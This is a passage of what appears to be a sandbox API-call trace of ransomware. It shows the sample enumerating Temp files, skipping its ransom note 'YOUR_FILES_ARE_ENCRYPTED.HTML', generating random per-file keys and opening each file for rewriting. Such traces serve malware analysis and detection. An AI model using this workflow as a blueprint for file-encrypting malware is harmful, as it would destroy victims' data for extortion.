hFile=0x5b0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=72141) returned 1 [0164.091] GetProcessHeap () returned 0x270000 [0164.091] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0164.092] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="95") returned 2 [0164.092] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="A5") 
returned 2 [0164.092] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="B4") returned 2 [0164.092] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="15") returned 2 [0164.092] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="0B") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="74") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="37") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="52") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="57") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="33") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="40") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="09") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="E0") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="89") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="94") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="C5") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="0B") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="B1") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="15") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="BD") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="EE") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="03") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="7B") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd786, 
param_2="%02X" | out: param_1="DC") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="20") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="8B") returned 2 [0164.094] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="FB") returned 2 [0164.094] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="82") returned 2 [0164.094] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="8C") returned 2 [0164.094] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="8F") returned 2 [0164.094] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="AA") returned 2 [0164.094] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="10") returned 2 [0164.095] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUkj-n.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUkj-n.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUkj-n.m4a" [0164.095] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.095] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0164.109] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x91eb8960, ftCreationTime.dwHighDateTime=0x1d7e0d4, ftLastAccessTime.dwLowDateTime=0x52191820, ftLastAccessTime.dwHighDateTime=0x1d7e511, ftLastWriteTime.dwLowDateTime=0x52191820, ftLastWriteTime.dwHighDateTime=0x1d7e511, nFileSizeHigh=0x0, nFileSizeLow=0xd6b, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="bUUqVBJ.avi", cAlternateFileName="")) returned 1 [0164.109] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUUqVBJ.avi") returned 54 [0164.109] lstrcmpW (lpString1="bUUqVBJ.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.109] PathFindExtensionW (pszPath="bUUqVBJ.avi") returned=".avi" [0164.109] lstrlenW (lpString=".avi") returned 4 [0164.109] PathFindExtensionW (pszPath="bUUqVBJ.avi") returned=".avi" [0164.109] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUUqVBJ.avi" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\buuqvbj.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0164.110] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=3435) returned 1 [0164.110] GetProcessHeap () returned 0x270000 [0164.110] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0164.111] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="EC") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="00") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="2C") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="F5") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="2F") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="89") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="16") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="E1") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="CC") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="21") 
returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="35") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="37") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="52") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="17") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="63") returned 2 [0164.111] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="8E") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="CD") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="E8") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="A1") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="B9") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="51") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="22") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="D6") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="DE") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="8A") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="E1") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="68") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="25") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="13") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="9C") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="27") returned 2 [0164.112] wsprintfW (in: param_1=0x4ebd7a6, 
param_2="%02X" | out: param_1="69") returned 2 [0164.113] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUUqVBJ.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUUqVBJ.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUUqVBJ.avi" [0164.113] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.113] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0164.136] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b5ea70, ftCreationTime.dwHighDateTime=0x1d7e4dd, ftLastAccessTime.dwLowDateTime=0x1b58e0e0, ftLastAccessTime.dwHighDateTime=0x1d7e6ce, ftLastWriteTime.dwLowDateTime=0x1b58e0e0, ftLastWriteTime.dwHighDateTime=0x1d7e6ce, nFileSizeHigh=0x0, nFileSizeLow=0x70f9, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="DidKyJ.flv", cAlternateFileName="")) returned 1 [0164.136] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\DidKyJ.flv") returned 53 [0164.136] lstrcmpW (lpString1="DidKyJ.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.136] PathFindExtensionW (pszPath="DidKyJ.flv") returned=".flv" [0164.136] lstrlenW (lpString=".flv") returned 4 [0164.136] PathFindExtensionW (pszPath="DidKyJ.flv") returned=".flv" [0164.136] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\DidKyJ.flv" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\didkyj.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0164.137] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=28921) returned 1 [0164.137] GetProcessHeap () returned 0x270000 [0164.137] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0164.138] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="17") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="B0") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="C2") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="87") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="C7") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="DD") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="08") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="0E") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="C8") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="7E") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="F4") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="38") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="FE") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="7A") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="FD") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="42") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="98") returned 2 [0164.138] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="80") returned 
2 [0164.138] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="13") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="49") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="63") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="AB") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="36") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="02") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="01") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="28") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="92") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="BC") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="FB") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="0C") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="9E") returned 2 [0164.139] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="77") returned 2 [0164.140] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\DidKyJ.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\DidKyJ.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\DidKyJ.flv" [0164.140] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.140] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0164.152] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: 
lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4f3cf80, ftCreationTime.dwHighDateTime=0x1d7de31, ftLastAccessTime.dwLowDateTime=0x461a4970, ftLastAccessTime.dwHighDateTime=0x1d7de65, ftLastWriteTime.dwLowDateTime=0x461a4970, ftLastWriteTime.dwHighDateTime=0x1d7de65, nFileSizeHigh=0x0, nFileSizeLow=0x9480, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Ezjziivl4A.gif", cAlternateFileName="EZJZII~1.GIF")) returned 1 [0164.152] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Ezjziivl4A.gif") returned 57 [0164.152] lstrcmpW (lpString1="Ezjziivl4A.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.152] PathFindExtensionW (pszPath="Ezjziivl4A.gif") returned=".gif" [0164.152] lstrlenW (lpString=".gif") returned 4 [0164.152] PathFindExtensionW (pszPath="Ezjziivl4A.gif") returned=".gif" [0164.152] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Ezjziivl4A.gif" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\ezjziivl4a.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0164.153] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=38016) returned 1 [0164.153] GetProcessHeap () returned 0x270000 [0164.153] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0164.154] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="90") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="6C") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="CF") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | 
out: param_1="61") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="FB") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="2B") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="45") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="43") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="1F") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="AA") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="E5") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="88") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="45") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="D2") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="BA") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="B1") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="75") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="F2") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="B6") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="E8") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="C9") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="C8") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="4B") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="00") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="77") returned 2 [0164.154] wsprintfW (in: 
param_1=0x4ebd78e, param_2="%02X" | out: param_1="D1") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="99") returned 2 [0164.154] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="A7") returned 2 [0164.155] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="69") returned 2 [0164.155] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="29") returned 2 [0164.155] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="46") returned 2 [0164.155] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="4A") returned 2 [0164.155] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Ezjziivl4A.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Ezjziivl4A.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Ezjziivl4A.gif" [0164.155] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.155] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0164.159] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdd18e470, ftCreationTime.dwHighDateTime=0x1d7d90c, ftLastAccessTime.dwLowDateTime=0x83373e10, ftLastAccessTime.dwHighDateTime=0x1d7dbdd, ftLastWriteTime.dwLowDateTime=0x83373e10, ftLastWriteTime.dwHighDateTime=0x1d7dbdd, nFileSizeHigh=0x0, nFileSizeLow=0x687b, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="FMDT A0se5XpB9Td_C.wav", cAlternateFileName="FMDTA0~1.WAV")) returned 1 [0164.165] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\FMDT A0se5XpB9Td_C.wav") returned 65 [0164.165] lstrcmpW (lpString1="FMDT 
A0se5XpB9Td_C.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.165] PathFindExtensionW (pszPath="FMDT A0se5XpB9Td_C.wav") returned=".wav" [0164.165] lstrlenW (lpString=".wav") returned 4 [0164.165] PathFindExtensionW (pszPath="FMDT A0se5XpB9Td_C.wav") returned=".wav" [0164.165] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\FMDT A0se5XpB9Td_C.wav" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\fmdt a0se5xpb9td_c.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0164.166] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=26747) returned 1 [0164.166] GetProcessHeap () returned 0x270000 [0164.166] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0164.167] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="BA") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="D1") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="A1") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="A4") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="C4") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="69") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="A6") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="57") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="88") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="A4") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd752, 
param_2="%02X" | out: param_1="A3") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="31") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="A3") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="14") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="C8") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="48") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="BD") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="98") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="87") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="CD") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="A6") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="48") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="71") returned 2 [0164.167] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="21") returned 2 [0164.168] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="2A") returned 2 [0164.168] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="BD") returned 2 [0164.168] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="C1") returned 2 [0164.168] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="ED") returned 2 [0164.168] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="0D") returned 2 [0164.168] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="89") returned 2 [0164.168] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="5E") returned 2 [0164.168] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="65") returned 2 [0164.168] lstrcpyW 
(in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\FMDT A0se5XpB9Td_C.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\FMDT A0se5XpB9Td_C.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\FMDT A0se5XpB9Td_C.wav" [0164.168] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.168] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0164.177] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd249af30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xdc63ddb0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xdc63ddb0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="FXSAPIDebugLogFile.txt", cAlternateFileName="FXSAPI~1.TXT")) returned 1 [0164.177] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt") returned 65 [0164.177] lstrcmpW (lpString1="FXSAPIDebugLogFile.txt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.177] PathFindExtensionW (pszPath="FXSAPIDebugLogFile.txt") returned=".txt" [0164.177] lstrlenW (lpString=".txt") returned 4 [0164.177] PathFindExtensionW 